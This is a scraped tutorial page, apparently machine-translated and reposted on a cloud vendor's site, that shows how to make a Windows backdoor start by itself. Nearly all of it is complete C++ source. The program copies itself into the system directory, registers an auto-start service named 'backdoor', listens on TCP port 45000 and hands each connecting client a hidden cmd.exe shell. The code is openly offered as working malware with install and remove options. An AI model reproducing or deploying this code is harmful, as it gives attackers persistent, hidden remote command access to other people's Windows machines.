Secure Road--c/c++ realize backdoor service self-start

Source: Internet
Author: User
Tags sin

Brief introduction

Windows NT system Backdoor to implement self-booting, there are many ways, such as the registry self-boot , image hijacking technology ,svchost self-booting and the introduction of this section of the Service self-initiated methods, The service self-priming is less likely to be discovered than the three other types of startup methods needed to modify the registry.

Examples of C + + code
filename:serviceautorundemo.cpp//Creator: peterz1997//date:2018-5-4 23:19//comment:create Service to make the backdoor Run automatically////////////////////// #include <iostream> #include <WinSock2.h> #include < winsock.h> #include <windows.h> #include <Winsvc.h> #include <cstdio> #include <cstring># pragma comment (lib, "Ws2_32.lib") using namespace std; #define Service_op_error-1#define Service_already_run-2const unsigned int max_count = 255;           String Max lengthconst DWORD PORT = 45000; Listen portconst unsigned int link_count = 30; Max Link numberservice_status g_servicestatus; Service_status_handle g_hservicestatus;/** * @brief CallBack Function to Translate Service Control Code * @param dwcode Se Rvice Control Code */void WINAPI servicecontrol (DWORD dwcode) {switch (Dwcode) {//service pause case Service_conTROL_PAUSE:g_ServiceStatus.dwCurrentState = service_paused;        Break        Service Continuation Case SERVICE_CONTROL_CONTINUE:g_ServiceStatus.dwCurrentState = service_running;        Break        Service Stop Case SERVICE_CONTROL_STOP:g_ServiceStatus.dwCurrentState = service_stopped;        G_servicestatus.dwwin32exitcode = 0;        G_servicestatus.dwcheckpoint = 0;        G_servicestatus.dwwaithint = 0;    Break    Case Service_control_interrogate:break;    Default:break;  }//Set service state if (SetServiceStatus (g_hservicestatus, &g_servicestatus) = = 0) {printf ("Set service status    Error\n "); } return;     /** * @brief Start Remote Shell * @lpParam the Client Handle */dword WINAPI Startshell (lpvoid lpparam) {startupinfo si;    Process_information Pi;    CHAR Cmdline[max_count] = {0};    Getstartupinfo (&AMP;SI);    SI.CB = sizeof (STARTUPINFO);    Si.hstdinput = Si.hstdoutput = Si.hstderror = (HANDLE) Lpparam; Si.dwflags = STArtf_useshowwindow |    Startf_usestdhandles;    Si.wshowwindow = Sw_hide;    GetSystemDirectory (cmdline, sizeof (cmdline));    strcat_s (cmdline, sizeof (CmdLine), "\\cmd.exe"); while (!    CreateProcess (NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &AMP;SI, &AMP;PI)) {Sleep (100);    } WaitForSingleObject (Pi.hprocess, INFINITE);    CloseHandle (pi.hprocess);    CloseHandle (Pi.hthread); return 0;} /** * @brief Service Running Function * @lpParam NULL */dword WINAPI runservice (lpvoid lpparam) {CHAR Wmessage[max_coun    T] = "<================= Welcome to back Door >_< ==================>\n";    SOCKET sclient[30];    DWORD dwthreadid[30];    HANDLE hthread[30];    Wsadata WSD;        if (WSAStartup (0x0202, &AMP;WSD)) {printf ("WSAStartup Process error\n");    return 0;    } SOCKET Slisten = WSASocket (Af_inet, Sock_stream, ipproto_tcp, NULL, 0, 0);    Sockaddr_in sin;    sin.sin_family = af_inet;    Sin.sin_port = htons (port); Sin.sin_addr. S_un. S_aDDR = Inaddr_any;    if (Bind (Slisten, (lpsockaddr) &sin, sizeof (SIN))) return 0;    if (Listen (Slisten, link_count)) return 0;        for (int i = 0; i < Link_count; i++) {Sclient[i] = accept (Slisten, NULL, NULL);        Hthread[i] = CreateThread (NULL, 0, Startshell, (LPVOID) sclient[i], 0, &dwthreadid[i]);    Send (Sclient[i], Wmessage, strlen (Wmessage), 0);    } waitformultipleobjects (Link_count, Hthread, TRUE, INFINITE); return 0;}    /** * @brief The Main Function of the Service */void WINAPI servicemain (DWORD dwargc, LPTSTR *lpargv) {HANDLE hthread;    G_servicestatus.dwcheckpoint = 0; g_servicestatus.dwcontrolsaccepted = Service_accept_pause_continue |    Service_accept_stop;    G_servicestatus.dwcurrentstate = service_start_pending;    G_servicestatus.dwservicespecificexitcode = 0;    G_servicestatus.dwservicetype = Service_win32;    G_servicestatus.dwwaithint = 0;    G_servicestatus.dwwin32exitcode = 0; G_hservicestatus = RegisterServiceCtrlHandler ("Backdoor ", ServiceControl);        if (!g_hservicestatus) {printf ("Register Service error\n");    Return    } g_servicestatus.dwcurrentstate = service_running;    G_servicestatus.dwcheckpoint = 0;    G_servicestatus.dwwaithint = 0; if (!        SetServiceStatus (G_hservicestatus, &g_servicestatus)) {printf ("Set servicestatus Error!\n");    Return    } hthread = CreateThread (null, 0, runservice, NULL, 0, NULL);    if (!hthread) {printf ("Create Thread error\n"); } return;    /** * @brief Install Service */int apientry installservice () {DWORD dwerrorcode;    Sc_handle Hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    CHAR Szsystempath[max_count] = "n";    CHAR Szfileselfpath[max_count] = "n";    GetSystemDirectory (Szsystempath, sizeof (Szsystempath));    GetModuleFileName (NULL, Szfileselfpath, sizeof (Szfileselfpath));    strcat_s (Szsystempath, "\\sysWork.exe"); CopyFile (Szfileselfpath, Szsystempath, true);   Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Can not Open the Service manager\n");    return service_op_error;    } printf ("Service Manager opened success\n"); Hservicehandle = CreateService (Hscmanager, "backdoor", "backdoor", service_all_access, Service_win32_own_process,    Service_Auto_Start, Service_error_ignore, szsystempath, NULL, NULL, NULL, NULL, or NULL);        if (!hservicehandle) {Dwerrorcode = GetLastError (); if (Dwerrorcode = = error_service_exists) {hservicehandle = OpenService (Hscmanager, "backdoor", Service_            all_access);                if (!hservicehandle) {printf ("Can not Create/open service\n");                Closeservicehandle (Hservicehandle);            return service_op_error;            } else {printf ("Service opened success\n"); }}} else {printf ("Service Create success\n "); } if (!        StartService (hservicehandle, 0, NULL)) {Dwerrorcode = GetLastError ();            if (Dwerrorcode = = error_service_already_running) {printf ("Serveice is already running\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_already_run;            } else {printf ("Serveice START error\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_op_error; }} while (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate            = = service_start_pending) {Sleep (100);        Continue } if (ssservicestatus.dwcurrentstate! = service_running) {printf ("SERVICE Start Process error\n"            );            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager); Return SERVICe_op_error;        } else {break; }} if (!        QueryServiceStatus (Hservicehandle, &ssservicestatus)) {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Service Start success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;}    /** * @brief Remove Service */int removeservice () {Sc_handle hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Open Service Manager error\n");    return service_op_error;    } printf ("Open Service Manager success\n");    Hservicehandle = OpenService (Hscmanager, "backdoor", service_all_access);        if (!hservicehandle) {printf ("Open Service error\n");    return service_op_error; } printf ("Open Service Success\n "); if (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate = = SERVICE_RU        nning) {ControlService (Hservicehandle, Service_control_stop, &ssservicestatus);        }} else {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error; } if (!        DeleteService (Hservicehandle)) {printf ("Delete Service error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Remove Service success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;} /** * @brief main Function */int main (int argc, char* argv[]) {service_table_entry svtable[] = {{(LPSTR) "Backdo    or ", ServiceMain}, {null,null}};    StartServiceCtrlDispatcher (svtable); if (argc = = 2) {if (!STRICMP (argv[1], "--install")) {if (installservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");            }} else if (!stricmp (argv[1], "--remove")) {if (removeservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");        }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n");    }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n"); } return 0;}

Secure Path--c/c++ implement backdoor service self-start

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.